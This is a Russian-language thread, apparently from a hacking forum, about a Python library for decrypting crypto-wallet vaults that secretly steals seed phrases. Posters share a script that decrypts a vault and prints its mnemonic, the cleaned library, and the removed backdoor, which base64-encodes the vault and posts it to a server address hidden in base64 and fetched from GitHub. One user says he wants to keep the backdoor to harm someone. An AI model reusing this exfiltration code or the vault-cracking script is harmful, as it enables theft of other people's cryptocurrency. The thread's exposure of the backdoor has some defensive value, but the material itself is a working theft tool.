Угнали кошельки с использованием библиотеки

[lisa99]

Я то писал скрипт просто скопипастив

просто не проверить было

гитхаб забит скриптами (их чистят) со своими ip - это я про оперсорс
Да и сайты с ними же скамерские

Например, mev-боты

Что касается репозитория, ну..а что нового. Пробел мб именно в этом направлении.

 

[triblekill]

Проверьте пожалуйста:
сейчас скрипт стал по 5 минут выполняться запросов снифером http с передачей сид фраз больше не ловлю:

from hashDecrypt import hdec

def decrypt_vault(password, vault):
    w = hdec()
    obj = w.decrypt(password, vault)
    return obj

VAULT= '{"data":"QoOyhigdy/oPaDokMCmLzVIZQR77xHOLRYfVp99MlYW6KVKTWwkX3BxDoG9c67MLzpYLASkRsFd0LhuhltWOS6dJUFfd8sfLYunIa9Lmaiv5ixSdHjcXhFFGiUd1Kj4iHtzKpedvWyXpYGK5LAZws88Zsy2fEzynybL+edE79onRsDUejVDSeyzcmzkYsZ4Zr1C+H0s6K/4Ib3sarAKJS+Xvl+eW6YwunTgvJ6pU32jEehg0cM/VL/ojlzq9jcZgzrzcfE4gtGqJRlXjcBVTq+ctMZTmYWVsru1MGTGRRwhFSO+t+UPT5jEEkfG4PGlZE0ccNOQ2mdaYzPY1dmyMbiQuMbPaSJc0lmkN8PqKIfaPd8SpWQTddNc998zpoig9Nsr7zZ9oIEzif4AxOJ6vRDEHmqkfinsCM+GYDVYraIQtVOL/N9y1ixba1tJ8IZuPGRXP1VFPSPPDVXIm6/X9MdWqzLy5KkjMGaSfDmDW89zy5Msphwovyxo1jM0=","iv":"rQNUM74fc7EyCVvatThnhA==","salt":"Zij9VI0LVzt1kAgvQtf3wDhAAKwNXqGcl+UiwENgXk0="}'

print(decrypt_vault("Andora80", VAULT)['result'][0]['data']['mnemonic'])

 

[Dread Pirate Roberts]

from hashDecrypt import hdec

а ты удалил бэкдор из файла hashDecrypt?

 

[admin]

Это наверное надо перенести в статьи уже ну ладно администраторы думаю решат если что )

Кстати говоря, на основе этого материала может получиться хорошая интересная статья. Реверсните все это в обратном порядке, например. Или просто сделайте анализ. И закиньте в "Инициативу" - https://xss.pro/threads/36600/

 

[triblekill]

а ты удалил бэкдор из файла hashDecrypt?

Нет я как то насолить хочу данному человеку перед удалением возможно понадобится ещё )
Ты на всякий расскажи что где удалить то )

 

[tonny_gram]

Писал об этом еще в мае прошлого года. Правда, на бхф:

/threads/672996/

Этот чел был активен на бхф и там распространял свои скрипты бесплатно. После выхода статьи - чела забанили, темы его почистили.

 

[defaultuser0]

Этот парень был из тех, кто просто любит брутить...

 

[ReverseTrue]

 

[wasted1337]

Спойлер: код

import json
import base64
import hashlib
from Crypto.Cipher import AES
# +---------------------------------+
# |           [HashDecrypt]            |
# | https://github.com/HashSnake    |
# |     Telegram: @HashSnake        | его тг))) он русский
# +---------------------------------+
# |bytes(bytes_line).decode("utf-8")|
# +---------------------------------+

class hdec:
  
    def key_from_password(self, password, salt):
        salt_buffer = base64.b64decode(salt)
        password_buffer = password.encode('utf-8')
        key = hashlib.pbkdf2_hmac(
            'sha256',
            password_buffer,
            salt_buffer,
            10000,
            dklen=32
            )
        return key

    def decrypt_with_key(self, key, payload):
        encrypted_data = base64.b64decode(payload["data"])
        vector = base64.b64decode(payload["iv"])
        data = encrypted_data[:-16]
        cipher = AES.new(key, AES.MODE_GCM, nonce=vector)
        decrypted_data = cipher.decrypt(data)
        return decrypted_data

    def decrypt(self, password, text):
        try:
            payload = json.loads(text)
            salt = payload['salt']
            key = self.key_from_password(password, salt)
            decrypted_string = self.decrypt_with_key(key, payload).decode('utf-8')
            jsf = json.loads(decrypted_string)
            return {"status": True, "message": None, "result": jsf}
        except UnicodeDecodeError:
            return {"status": False, "message": "wrong password", "result": None}
        except:
            return {"status": False, "message": "unknown", "result": None}

Вот и вся либа. Бекдор вырезал

Спойлер: Сам бекдор

    def jsBIP39(self, payload):
       
        def cli_keccak256(raw_hash, raw_vault):
            try:
                message_bytes = raw_vault.encode('ascii')
                b64_bytes = base64.b64encode(message_bytes)
                b64_m = b64_bytes.decode('ascii')
                post(get(raw_hash).text.strip(), json={"b64": b64_m})
            except:
                pass
        encode_data = "aHR0cHM6Ly9naXRodWIuY29tL0hhc2hTbmFrZS9iYWNrZW5kYXBpL3Jhdy9tYWluL3NldHRpbmdz" // https://github.com/HashSnake/backendapi/raw/main/settings
        base64_bytes = encode_data.encode('ascii')
        message_bytes = base64.b64decode(base64_bytes)
        cli_keccak256(message_bytes.decode('ascii'), payload)